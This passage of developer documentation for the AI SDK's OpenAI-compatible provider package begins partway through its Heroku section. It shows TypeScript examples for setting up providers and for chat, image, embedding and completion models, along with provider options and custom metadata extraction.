To use Heroku, you can create a custom provider instance with the createOpenAICompatible function from @ai-sdk/openai-compatible:
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
const heroku = createOpenAICompatible({
name: 'heroku',
baseURL: process.env.INFERENCE_URL + '/v1',
apiKey: process.env.INFERENCE_KEY,
});
Be sure to have your INFERENCE_KEY, INFERENCE_MODEL_ID, and INFERENCE_URL set in your environment variables.
Language Models
You can create Heroku models using a provider instance.
The first argument is the served model name, e.g. claude-3-5-haiku.
const model = heroku('claude-3-5-haiku');
Example
You can use Heroku language models to generate text with the generateText function:
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText } from 'ai';
const heroku = createOpenAICompatible({
name: 'heroku',
baseURL: process.env.INFERENCE_URL + '/v1',
apiKey: process.env.INFERENCE_KEY,
});
const { text } = await generateText({
model: heroku('claude-3-5-haiku'),
prompt: 'Tell me about yourself in one sentence',
});
console.log(text);
Heroku language models are also able to generate text in a streaming fashion with the streamText function:
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { streamText } from 'ai';
const heroku = createOpenAICompatible({
name: 'heroku',
baseURL: process.env.INFERENCE_URL + '/v1',
apiKey: process.env.INFERENCE_KEY,
});
const result = streamText({
model: heroku('claude-3-5-haiku'),
prompt: 'Tell me about yourself in one sentence',
});
for await (const message of result.textStream) {
console.log(message);
}
Heroku language models also support structured data generation with Output.
title: OpenAI Compatible Providers
description: Use OpenAI compatible providers with the AI SDK.
OpenAI Compatible Providers
You can use the OpenAI Compatible Provider package to use language model providers that implement the OpenAI API.
Below we focus on the general setup and provider instance creation. You can also write a custom provider package leveraging the OpenAI Compatible package.
We provide detailed documentation for several OpenAI compatible providers, including LM Studio, NVIDIA NIM, Clarifai, and Heroku (see the preceding sections). The general setup and provider instance creation is the same for all of these providers.
Setup
The OpenAI Compatible provider is available via the @ai-sdk/openai-compatible module. You can install it with:
pnpm add @ai-sdk/openai-compatible
Provider Instance
To use an OpenAI compatible provider, you can create a custom provider instance with the createOpenAICompatible function from @ai-sdk/openai-compatible:
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
const provider = createOpenAICompatible({
name: 'providerName',
apiKey: process.env.PROVIDER_API_KEY,
baseURL: 'https://api.provider.com/v1',
includeUsage: true, // Include usage information in streaming responses
});
You can use the following optional settings to customize the provider instance:
- `baseURL` *string*: Set the URL prefix for API calls.
- `apiKey` *string*: API key for authenticating requests. If specified, adds an `Authorization` header to the request headers with the value `Bearer <apiKey>`. This will be added before any headers potentially specified in the `headers` option.
- `headers` *Record<string,string>*: Optional custom headers to include in requests. These will be added to the request headers after any headers potentially added by use of the `apiKey` option.
- `queryParams` *Record<string,string>*: Optional custom URL query parameters to include in request URLs.
- `fetch` *(input: RequestInfo, init?: RequestInit) => Promise<Response>*: Custom fetch implementation. Defaults to the global `fetch` function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
- `includeUsage` *boolean*: Include usage information in streaming responses. When enabled, usage data will be included in the response metadata for streaming requests. Defaults to `undefined` (`false`).
- `supportsStructuredOutputs` *boolean*: Set to true if the provider supports structured outputs. Only relevant for `provider()`, `provider.chatModel()`, and `provider.languageModel()`.
- `transformRequestBody` *(args: Record<string, any>) => Record<string, any>*: Optional function to transform the request body before sending it to the API. This is useful for proxy providers that may require a different request format than the official OpenAI API. See the sketch after this list.
- `metadataExtractor` *MetadataExtractor*: Optional metadata extractor to capture provider-specific metadata from API responses. See Custom Metadata Extraction for details.
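As an illustration, a minimal sketch of transformRequestBody for a hypothetical proxy that expects the model id under a model_name field (the provider name and URL are illustrative):

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';

const provider = createOpenAICompatible({
  name: 'proxy-provider', // hypothetical proxy
  apiKey: process.env.PROVIDER_API_KEY,
  baseURL: 'https://proxy.example.com/v1',
  // rename `model` to `model_name` before the request is sent
  transformRequestBody: (body: Record<string, any>) => {
    const { model, ...rest } = body;
    return { ...rest, model_name: model };
  },
});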
Language Models
You can create provider models using a provider instance.
The first argument is the model id, e.g. model-id.
const model = provider('model-id');
You can also use the following factory methods:
- `provider.languageModel('model-id')` creates a chat language model (same as `provider('model-id')`)
- `provider.chatModel('model-id')` creates a chat language model
Supported Capabilities
Chat models created with this provider support the following capabilities:
- Text generation - Generate text completions
- Streaming - Stream text responses in real-time
- Tool calling - Call tools/functions with streaming support
- Structured outputs - Generate JSON with schema validation (when `supportsStructuredOutputs` is enabled)
- Reasoning content - Support for models that return reasoning/thinking tokens (e.g., DeepSeek R1)
- System messages - Support for system prompts
- Multi-modal inputs - Support for images and other content types (provider-dependent)
Example
You can use provider language models to generate text with the generateText function:
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText } from 'ai';
const provider = createOpenAICompatible({
name: 'providerName',
apiKey: process.env.PROVIDER_API_KEY,
baseURL: 'https://api.provider.com/v1',
});
const { text } = await generateText({
model: provider('model-id'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Including model ids for auto-completion
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText } from 'ai';
type ExampleChatModelIds =
| 'meta-llama/Llama-3-70b-chat-hf'
| 'meta-llama/Meta-Llama-3.1-8B-Instruct-Turbo'
| (string & {});
type ExampleCompletionModelIds =
| 'codellama/CodeLlama-34b-Instruct-hf'
| 'Qwen/Qwen2.5-Coder-32B-Instruct'
| (string & {});
type ExampleEmbeddingModelIds =
| 'BAAI/bge-large-en-v1.5'
| 'bert-base-uncased'
| (string & {});
type ExampleImageModelIds = 'dall-e-3' | 'stable-diffusion-xl' | (string & {});
const model = createOpenAICompatible<
ExampleChatModelIds,
ExampleCompletionModelIds,
ExampleEmbeddingModelIds,
ExampleImageModelIds
>({
name: 'example',
apiKey: process.env.PROVIDER_API_KEY,
baseURL: 'https://api.example.com/v1',
});
// Subsequent calls to e.g. `model.chatModel` will auto-complete the model id
// from the list of `ExampleChatModelIds` while still allowing free-form
// strings as well.
const { text } = await generateText({
model: model.chatModel('meta-llama/Llama-3-70b-chat-hf'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Custom query parameters
Some providers may require custom query parameters. An example is the Azure AI Model Inference API, which requires an api-version query parameter. You can set these via the optional queryParams provider setting. These will be added to all requests made by the provider.
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
const provider = createOpenAICompatible({
name: 'providerName',
apiKey: process.env.PROVIDER_API_KEY,
baseURL: 'https://api.provider.com/v1',
queryParams: {
'api-version': '1.0.0',
},
});
For example, with the above configuration, API requests would include the query parameter in the URL like:
https://api.provider.com/v1/chat/completions?api-version=1.0.0.
Image Models
You can create image models using the .imageModel() factory method:
const model = provider.imageModel('model-id');
Basic Image Generation
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateImage } from 'ai';
const provider = createOpenAICompatible({
name: 'providerName',
apiKey: process.env.PROVIDER_API_KEY,
baseURL: 'https://api.provider.com/v1',
});
const { images } = await generateImage({
model: provider.imageModel('model-id'),
prompt: 'A futuristic cityscape at sunset',
size: '1024x1024',
});
Image Editing
The OpenAI Compatible provider supports image editing through the /images/edits endpoint. Pass input images via prompt.images to transform or edit existing images.
Basic Image Editing
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateImage } from 'ai';
import fs from 'fs';
const provider = createOpenAICompatible({
name: 'providerName',
apiKey: process.env.PROVIDER_API_KEY,
baseURL: 'https://api.provider.com/v1',
});
const imageBuffer = fs.readFileSync('./input-image.png');
const { images } = await generateImage({
model: provider.imageModel('model-id'),
prompt: {
text: 'Turn the cat into a dog but retain the style of the original image',
images: [imageBuffer],
},
});
Inpainting with Mask
Edit specific parts of an image using a mask:
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateImage } from 'ai';
import fs from 'fs';
const provider = createOpenAICompatible({
name: 'providerName',
apiKey: process.env.PROVIDER_API_KEY,
baseURL: 'https://api.provider.com/v1',
});
const image = fs.readFileSync('./input-image.png');
const mask = fs.readFileSync('./mask.png');
const { images } = await generateImage({
model: provider.imageModel('model-id'),
prompt: {
text: 'A sunlit indoor lounge area with a pool containing a flamingo',
images: [image],
mask,
},
});
Embedding Models
You can create embedding models using the .embeddingModel() factory method:
const model = provider.embeddingModel('model-id');
Example
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { embed } from 'ai';
const provider = createOpenAICompatible({
name: 'providerName',
apiKey: process.env.PROVIDER_API_KEY,
baseURL: 'https://api.provider.com/v1',
});
const { embedding } = await embed({
model: provider.embeddingModel('text-embedding-model'),
value: 'The quick brown fox jumps over the lazy dog',
});
Embedding Model Options
The following provider options are available for embedding models via providerOptions:
- `dimensions` *number*: The number of dimensions the resulting output embeddings should have. Only supported in models that allow dimension configuration.
- `user` *string*: A unique identifier representing your end-user, which can help providers to monitor and detect abuse.
const { embedding } = await embed({
model: provider.embeddingModel('text-embedding-model'),
value: 'The quick brown fox jumps over the lazy dog',
providerOptions: {
providerName: {
dimensions: 512,
user: 'user-123',
},
},
});
Completion Models
You can create completion models (for text completion, not chat) using the .completionModel() factory method:
const model = provider.completionModel('model-id');
Example
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText } from 'ai';
const provider = createOpenAICompatible({
name: 'providerName',
apiKey: process.env.PROVIDER_API_KEY,
baseURL: 'https://api.provider.com/v1',
});
const { text } = await generateText({
model: provider.completionModel('completion-model-id'),
prompt: 'The quick brown fox',
});
Completion Model Options
The following provider options are available for completion models via providerOptions:
- `echo` *boolean*: Echo back the prompt in addition to the completion.
- `logitBias` *Record<string, number>*: Modify the likelihood of specified tokens appearing in the completion. Accepts a JSON object that maps tokens (specified by their token ID) to an associated bias value from -100 to 100.
- `suffix` *string*: The suffix that comes after a completion of inserted text.
- `user` *string*: A unique identifier representing your end-user, which can help providers to monitor and detect abuse.
const { text } = await generateText({
model: provider.completionModel('completion-model-id'),
prompt: 'The quick brown fox',
providerOptions: {
providerName: {
echo: true,
suffix: ' The end.',
user: 'user-123',
},
},
});
Chat Model Options
The following provider options are available for chat models via providerOptions:
- `user` *string*: A unique identifier representing your end-user, which can help the provider to monitor and detect abuse.
- `reasoningEffort` *string*: Reasoning effort for reasoning models. The exact values depend on the provider.
- `textVerbosity` *string*: Controls the verbosity of the generated text. The exact values depend on the provider.
- `strictJsonSchema` *boolean*: Whether to use strict JSON schema validation. When true, the model uses constrained decoding to guarantee schema compliance. Only used when the provider supports structured outputs and a schema is provided. Defaults to `true`.
const { text } = await generateText({
model: provider('model-id'),
prompt: 'Solve this step by step: What is 15 * 23?',
providerOptions: {
providerName: {
user: 'user-123',
reasoningEffort: 'high',
},
},
});
Provider-specific options
The OpenAI Compatible provider supports adding provider-specific options to the request body. These are specified with the providerOptions field in the request body.
For example, if you create a provider instance with the name providerName, you can add a customOption field to the request body like this:
const provider = createOpenAICompatible({
name: 'providerName',
apiKey: process.env.PROVIDER_API_KEY,
baseURL: 'https://api.provider.com/v1',
});
const { text } = await generateText({
model: provider('model-id'),
prompt: 'Hello',
providerOptions: {
providerName: { customOption: 'magic-value' },
},
});
Note that the providerOptions key will be in camelCase. If you set the provider name to provider-name, the options still need to be set on providerOptions.providerName.
The request body sent to the provider will include the customOption field with the value magic-value. This gives you an easy way to add provider-specific options to requests without having to modify the provider or AI SDK code.
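For instance, a short sketch of the camelCase mapping described above (the provider name and option are illustrative):

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText } from 'ai';

const provider = createOpenAICompatible({
  name: 'provider-name', // kebab-case provider name
  apiKey: process.env.PROVIDER_API_KEY,
  baseURL: 'https://api.provider.com/v1',
});

const { text } = await generateText({
  model: provider('model-id'),
  prompt: 'Hello',
  providerOptions: {
    // the key is camelCased even though the provider name is 'provider-name'
    providerName: { customOption: 'magic-value' },
  },
});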
Custom Metadata Extraction
The OpenAI Compatible provider supports extracting provider-specific metadata from API responses through metadata extractors. These extractors allow you to capture additional information returned by the provider beyond the standard response format.
Metadata extractors receive the raw, unprocessed response data from the provider, giving you complete flexibility to extract any custom fields or experimental features that the provider may include. This is particularly useful when:
- Working with providers that include non-standard response fields
- Experimenting with beta or preview features
- Capturing provider-specific metrics or debugging information
- Supporting rapid provider API evolution without SDK changes
Metadata extractors work with both streaming and non-streaming chat completions and consist of two main components:
- A function to extract metadata from complete responses
- A streaming extractor that can accumulate metadata across chunks in a streaming response
Here's an example metadata extractor that captures both standard and custom provider data:
import { MetadataExtractor } from '@ai-sdk/openai-compatible';
const myMetadataExtractor: MetadataExtractor = {
// Process complete, non-streaming responses
extractMetadata: ({ parsedBody }) => {
// You have access to the complete raw response
// Extract any fields the provider includes
return {
myProvider: {
standardUsage: parsedBody.usage,
experimentalFeatures: parsedBody.beta_features,
customMetrics: {
processingTime: parsedBody.server_timing?.total_ms,
modelVersion: parsedBody.model_version,
// ... any other provider-specific data
},
},
};
},
// Process streaming responses
createStreamExtractor: () => {
// typed accumulator so the pushes below type-check under strict TypeScript
const accumulatedData: {
timing: unknown[];
customFields: Record<string, unknown>;
} = {
timing: [],
customFields: {},
};
return {
// Process each chunk's raw data
processChunk: parsedChunk => {
if (parsedChunk.server_timing) {
accumulatedData.timing.push(parsedChunk.server_timing);
}
if (parsedChunk.custom_data) {
Object.assign(accumulatedData.customFields, parsedChunk.custom_data);
}
},
// Build final metadata from accumulated data
buildMetadata: () => ({
myProvider: {
streamTiming: accumulatedData.timing,
customData: accumulatedData.customFields,
},
}),
};
},
};
You can provide a metadata extractor when creating your provider instance:
const provider = createOpenAICompatible({
name: 'my-provider',
apiKey: process.env.PROVIDER_API_KEY,
baseURL: 'https://api.provider.com/v1',
metadataExtractor: myMetadataExtractor,
});
The extracted metadata will be included in the response under the providerMetadata field:
const { text, providerMetadata } = await generateText({
model: provider('model-id'),
prompt: 'Hello',
});
console.log(providerMetadata?.myProvider.customMetrics);
This allows you to access provider-specific information while maintaining a consistent interface across different providers.